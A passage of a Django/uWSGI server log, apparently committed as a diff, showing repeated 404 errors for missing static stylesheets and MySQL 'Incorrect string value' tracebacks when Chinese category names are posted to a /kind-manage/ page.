bytes in 9 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 2069|app: 0|req: 136/201] 219.228.146.253 () {38 vars in 886 bytes} [Thu Jan 14 07:45:23 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 2069|app: 0|req: 137/202] 219.228.146.253 () {38 vars in 890 bytes} [Thu Jan 14 07:45:23 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 2069|app: 0|req: 138/203] 219.228.146.253 () {38 vars in 898 bytes} [Thu Jan 14 07:45:23 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 2069|app: 0|req: 139/204] 219.228.146.253 () {38 vars in 854 bytes} [Thu Jan 14 07:45:23 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 2069|app: 0|req: 140/205] 219.228.146.253 () {38 vars in 874 bytes} [Thu Jan 14 07:45:23 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 16 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 2069|app: 0|req: 141/206] 219.228.146.253 () {38 vars in 874 bytes} [Thu Jan 14 07:45:23 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 2069|app: 0|req: 142/207] 219.228.146.253 () {38 vars in 820 bytes} [Thu Jan 14 07:45:23 2021] GET /static/css/animate.css => generated 3513 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 2069|app: 0|req: 143/208] 219.228.146.253 () {38 vars in 930 bytes} [Thu Jan 14 07:45:23 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 2069|app: 0|req: 144/209] 219.228.146.253 () {38 vars in 822 bytes} [Thu Jan 14 07:45:23 2021] GET /static/css/spinners.css => generated 3516 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 145/210] 219.228.146.253 () {40 vars in 930 bytes} [Thu Jan 14 07:45:24 2021] GET /kind-manage => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 181 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 146/211] 219.228.146.253 () {40 vars in 932 bytes} [Thu Jan 14 07:45:25 2021] GET /kind-manage/ => generated 6423 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 2069|app: 0|req: 147/212] 219.228.146.253 () {38 vars in 886 bytes} [Thu Jan 14 07:45:26 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 149/213] 219.228.146.146 () {40 vars in 905 bytes} [Thu Jan 14 07:45:46 2021] GET /kind-manage/? => generated 6423 bytes in 24 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +Internal Server Error: /kind-manage/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.DataError: (1366, "Incorrect string value: '\\xE8\\xA1\\xA8\\xE7\\x99\\xBD...' for column 'k_name' at row 1") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 541, in kind_manage + models.Kind.objects.create(k_name=k_name) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.DataError: (1366, "Incorrect string value: '\\xE8\\xA1\\xA8\\xE7\\x99\\xBD...' for column 'k_name' at row 1") +[pid: 2069|app: 0|req: 149/214] 219.228.146.146 () {48 vars in 987 bytes} [Thu Jan 14 07:45:46 2021] POST /kind-manage/ => generated 206836 bytes in 103 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 2069|app: 0|req: 150/215] 219.228.146.146 () {38 vars in 846 bytes} [Thu Jan 14 07:45:46 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 2069|app: 0|req: 151/216] 219.228.146.146 () {38 vars in 850 bytes} [Thu Jan 14 07:45:46 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 2069|app: 0|req: 152/217] 219.228.146.146 () {38 vars in 858 bytes} [Thu Jan 14 07:45:46 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 2069|app: 0|req: 153/218] 219.228.146.146 () {38 vars in 814 bytes} [Thu Jan 14 07:45:46 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 2069|app: 0|req: 154/219] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:45:46 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 8 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 2069|app: 0|req: 155/220] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:45:46 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 30 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 2069|app: 0|req: 156/221] 219.228.146.146 () {38 vars in 890 bytes} [Thu Jan 14 07:45:46 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 7 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/spinners.css +[pid: 2069|app: 0|req: 157/222] 219.228.146.146 () {38 vars in 782 bytes} [Thu Jan 14 07:45:46 2021] GET /static/css/spinners.css => generated 3516 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/css/animate.css +[pid: 2069|app: 0|req: 158/223] 219.228.146.146 () {38 vars in 780 bytes} [Thu Jan 14 07:45:46 2021] GET /static/css/animate.css => generated 3513 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +[pid: 2069|app: 0|req: 159/224] 219.228.146.146 () {40 vars in 906 bytes} [Thu Jan 14 07:45:56 2021] GET /kind-manage/? => generated 6423 bytes in 10 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 2069|app: 0|req: 161/225] 219.228.146.146 () {38 vars in 846 bytes} [Thu Jan 14 07:45:56 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 20 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 2069|app: 0|req: 162/226] 219.228.146.146 () {38 vars in 858 bytes} [Thu Jan 14 07:45:56 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 2069|app: 0|req: 163/227] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:45:56 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 2069|app: 0|req: 164/228] 219.228.146.146 () {38 vars in 850 bytes} [Thu Jan 14 07:45:56 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 2069|app: 0|req: 165/229] 219.228.146.146 () {38 vars in 814 bytes} [Thu Jan 14 07:45:56 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/animate.css +[pid: 2069|app: 0|req: 166/230] 219.228.146.146 () {38 vars in 780 bytes} [Thu Jan 14 07:45:56 2021] GET /static/css/animate.css => generated 3513 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Internal Server Error: /kind-manage/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.DataError: (1366, "Incorrect string value: '\\xE8\\xBF\\x90\\xE5\\x8A\\xA8...' for column 'k_name' at row 1") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 541, in kind_manage + models.Kind.objects.create(k_name=k_name) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.DataError: (1366, "Incorrect string value: '\\xE8\\xBF\\x90\\xE5\\x8A\\xA8...' for column 'k_name' at row 1") +[pid: 2069|app: 0|req: 166/231] 219.228.146.146 () {48 vars in 989 bytes} [Thu Jan 14 07:45:56 2021] POST /kind-manage/? => generated 207081 bytes in 227 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 2069|app: 0|req: 167/232] 219.228.146.146 () {38 vars in 834 bytes} [Thu Jan 14 07:45:56 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 10 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css +[pid: 2069|app: 0|req: 168/233] 219.228.146.146 () {38 vars in 890 bytes} [Thu Jan 14 07:45:56 2021] GET /static/scss/icons/material-design-iconic-font/css/materialdesignicons.min.css => generated 3678 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 2069|app: 0|req: 169/234] 219.228.146.146 () {38 vars in 782 bytes} [Thu Jan 14 07:45:56 2021] GET /static/css/spinners.css => generated 3516 bytes in 9 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +[pid: 2069|app: 0|req: 170/235] 219.228.146.253 () {40 vars in 934 bytes} [Thu Jan 14 07:45:59 2021] GET /kind-manage/? => generated 6423 bytes in 11 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +Internal Server Error: /kind-manage/ +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +pymysql.err.DataError: (1366, "Incorrect string value: '\\xE6\\xA0\\xA1\\xE5\\x9B\\xAD...' for column 'k_name' at row 1") + +The above exception was the direct cause of the following exception: + +Traceback (most recent call last): + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/exception.py", line 47, in inner + response = get_response(request) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/core/handlers/base.py", line 181, in _get_response + response = wrapped_callback(request, *callback_args, **callback_kwargs) + File "./app01/views.py", line 541, in kind_manage + models.Kind.objects.create(k_name=k_name) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 447, in create + obj.save(force_insert=True, using=self.db) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 754, in save + force_update=force_update, update_fields=update_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 792, in save_base + force_update, using, update_fields, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 895, in _save_table + results = self._do_insert(cls._base_manager, using, fields, returning_fields, raw) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/base.py", line 935, in _do_insert + using=using, raw=raw, + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/manager.py", line 85, in manager_method + return getattr(self.get_queryset(), name)(*args, **kwargs) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/query.py", line 1254, in _insert + return query.get_compiler(using=using).execute_sql(returning_fields) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/models/sql/compiler.py", line 1397, in execute_sql + cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 98, in execute + return super().execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 66, in execute + return self._execute_with_wrappers(sql, params, many=False, executor=self._execute) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 75, in _execute_with_wrappers + return executor(sql, params, many, context) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/utils.py", line 90, in __exit__ + raise dj_exc_value.with_traceback(traceback) from exc_value + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/utils.py", line 84, in _execute + return self.cursor.execute(sql, params) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/django/db/backends/mysql/base.py", line 73, in execute + return self.cursor.execute(query, args) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 163, in execute + result = self._query(query) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/cursors.py", line 321, in _query + conn.query(q) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 505, in query + self._affected_rows = self._read_query_result(unbuffered=unbuffered) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 724, in _read_query_result + result.read() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 1069, in read + first_packet = self.connection._read_packet() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/connections.py", line 676, in _read_packet + packet.raise_for_error() + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/protocol.py", line 223, in raise_for_error + err.raise_mysql_exception(self._data) + File "/www/wwwroot/master/pyweb/lib/python3.6/site-packages/pymysql/err.py", line 107, in raise_mysql_exception + raise errorclass(errno, errval) +django.db.utils.DataError: (1366, "Incorrect string value: '\\xE6\\xA0\\xA1\\xE5\\x9B\\xAD...' for column 'k_name' at row 1") +[pid: 2069|app: 0|req: 172/236] 219.228.146.253 () {48 vars in 1027 bytes} [Thu Jan 14 07:45:59 2021] POST /kind-manage/ => generated 206957 bytes in 155 msecs (HTTP/1.1 500) 6 headers in 187 bytes (1 switches on core 0) +Not Found: /static/scss/icons/linea-icons/linea.css +[pid: 2069|app: 0|req: 173/237] 219.228.146.253 () {38 vars in 854 bytes} [Thu Jan 14 07:45:59 2021] GET /static/scss/icons/linea-icons/linea.css => generated 3564 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/simple-line-icons/css/simple-line-icons.css +[pid: 2069|app: 0|req: 174/238] 219.228.146.253 () {38 vars in 898 bytes} [Thu Jan 14 07:45:59 2021] GET /static/scss/icons/simple-line-icons/css/simple-line-icons.css => generated 3630 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/themify-icons/themify-icons.css +[pid: 2069|app: 0|req: 175/239] 219.228.146.253 () {38 vars in 874 bytes} [Thu Jan 14 07:45:59 2021] GET /static/scss/icons/themify-icons/themify-icons.css => generated 3594 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/weather-icons/css/weather-icons.min.css +[pid: 2069|app: 0|req: 176/240] 219.228.146.253 () {38 vars in 890 bytes} [Thu Jan 14 07:45:59 2021] GET /static/scss/icons/weather-icons/css/weather-icons.min.css => generated 3618 bytes in 6 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/flag-icon-css/flag-icon.min.css +[pid: 2069|app: 0|req: 177/241] 219.228.146.253 () {38 vars in 874 bytes} [Thu Jan 14 07:45:59 2021] GET /static/scss/icons/flag-icon-css/flag-icon.min.css => generated 3594 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: /static/scss/icons/font-awesome/css/font-awesome.min.css +[pid: 2069|app: 0|req: 177/242] 219.228.146.253 () {38 vars in 886 bytes} [Thu Jan 14 07:45:59 2021] GET /static/scss/icons/font-awesome/css/font-awesome.min.css => generated 3612 bytes in 86 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 1) +Not Found: /static/css/spinners.css +[pid: 2069|app: 0|req: 178/243] 219.228.146.253 () {38 vars in 822 bytes} [Thu Jan 14 07:45:59 2021] GET /static/css/spinners.css => generated 3516 bytes in 5 msecs (HTTP/1.1 404) 5 headers in 159 bytes (1 switches on core 0) +Not Found: 